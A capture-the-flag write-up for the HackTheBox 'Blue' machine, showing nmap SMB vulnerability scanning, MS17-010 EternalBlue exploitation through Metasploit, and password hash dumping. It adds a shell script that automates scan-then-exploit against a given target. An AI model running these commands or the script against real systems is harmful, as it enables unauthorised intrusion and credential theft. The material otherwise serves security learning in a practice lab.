Blue is an easy-difficulty box on HackTheBox. It has been retired for some time, so you will need a VIP subscription to play with it. Whilst the name of the box gives away the vulnerability and the exploit we are going to use, it is still a fun box to complete, with plenty to learn, especially for beginners.
We start with nmap, scanning all 65,535 TCP ports (-p-) and running the default script set (-sC) together with version detection (-sV). Note that this does not do OS detection; that would need -O.
sudo nmap -sC -sV -p- 10.10.10.40
We can see that port 445 (SMB) is open, so, once again with nmap, let's target SMB specifically by running all of nmap's smb-vuln-* scripts against it. If you want to see exactly which scripts those are, you can search your local nmap script directory with:
locate nse | grep smb-vuln
For now, let's run the scan. The glob is quoted so that the shell does not try to expand it against files in the current directory before nmap sees it:
sudo nmap --script 'smb-vuln*' -p 139,445 10.10.10.40
The smb-vuln-ms17-010 script reports the box as VULNERABLE to MS17-010, the SMBv1 remote code execution bug exploited by EternalBlue.
Let's boot up Metasploit with the -q switch (msfconsole -q). It suppresses the banner and drops us straight into the console.
Let's search for "ms17-010". We get a few results.
There are a few, but let's start from the top. use 0 selects the first result, and options shows what it needs.
Set RHOSTS to the target and LHOST to our VPN interface, then run it:
set rhosts 10.10.10.40
set lhost tun0
We are presented with a Meterpreter session. We can navigate around using this shell and check who we landed as with getuid. Great for us, it is NT AUTHORITY\SYSTEM.
We can grab the root flag straight away from here (on HTB Windows boxes, root.txt sits on the Administrator's Desktop).
For bonus points we can also dump the local password hashes from the same session with Meterpreter's hashdump, which works precisely because we are running as SYSTEM.
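The whole workflow above can be scripted so that the exploit is only fired when the scan actually says VULNERABLE. The following is an added example and not code from the original write-up: it parses nmap's smb-vuln-* output (the embedded "Host script results" block is constructed for this example, including a made-up LIKELY VULNERABLE ms08-067 entry to show what must not count), and only then generates a Metasploit resource script and launches it. It assumes nmap and msfconsole are installed, that the VPN interface is tun0, and that the module we want is exploit/windows/smb/ms17_010_eternalblue (the post only says "select result 0").

```shell
#!/bin/sh
# Added example (not from the original write-up): automate the Blue workflow.
# 1. parse nmap smb-vuln-* output and keep only scripts that report VULNERABLE,
# 2. fire the exploit only when smb-vuln-ms17-010 is one of them.
# Assumptions: nmap and msfconsole are installed, the VPN interface is tun0,
# and the exploit module is exploit/windows/smb/ms17_010_eternalblue.

# Constructed sample of nmap "Host script results" for a box like Blue. The
# ms08-067 block is made up to show that "LIKELY VULNERABLE" must not count.
sample_nmap_output() {
    cat <<'EOF'
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms08-067:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_    Risk factor: HIGH
EOF
}

# vulnerable_scripts: read nmap normal output on stdin and print one line
# "<script-id> <IDs>" for every script block whose State is exactly VULNERABLE.
vulnerable_scripts() {
    awk '
        function flush(    line) {
            if (id != "" && state == "VULNERABLE") {
                line = id
                if (ids != "") line = line " " ids
                print line
            }
            id = ""; state = ""; ids = ""
        }
        # A script block starts with "| script-id:" or "|_script-id:"
        /^[|][ _][a-z0-9-]+:/ {
            flush()
            id = $0; sub(/^[|][ _]/, "", id); sub(/:.*/, "", id)
        }
        /State: / { state = $0; sub(/.*State: */, "", state); sub(/[ \t]+$/, "", state) }
        /IDs: /   { ids = $0;   sub(/.*IDs: */, "", ids);     sub(/[ \t]+$/, "", ids) }
        END       { flush() }
    '
}

# ms17_010_vulnerable: succeed only when smb-vuln-ms17-010 reported VULNERABLE
# (a NOT VULNERABLE or LIKELY VULNERABLE state is filtered out by the parser).
ms17_010_vulnerable() {
    vulnerable_scripts | grep -q '^smb-vuln-ms17-010'
}

# build_rc: emit a msfconsole resource script for the steps done by hand above.
# Module path is an assumption; $1 = target, $2 = LHOST interface (default tun0).
build_rc() {
    printf '%s\n' \
        "use exploit/windows/smb/ms17_010_eternalblue" \
        "set RHOSTS $1" \
        "set LHOST ${2:-tun0}" \
        "run"
}

# blue_attack: scan, decide, exploit. The glob is quoted so the shell does not
# expand it; "run" leaves you in the Meterpreter session for getuid/hashdump.
blue_attack() {
    target=$1
    rc=${TMPDIR:-/tmp}/blue_$$.rc
    if sudo nmap --script 'smb-vuln*' -p 139,445 "$target" | ms17_010_vulnerable; then
        build_rc "$target" tun0 > "$rc"
        msfconsole -q -r "$rc"
    else
        echo "$target: smb-vuln-ms17-010 did not report VULNERABLE, not exploiting" >&2
        return 1
    fi
}
```

Usage: source the file and call blue_attack 10.10.10.40. The parser keys on the exact State string because nmap's vulns library also emits LIKELY VULNERABLE and NOT VULNERABLE, and an automated exploit that treats "likely" as "yes" is how you end up crashing a host you were only asked to assess.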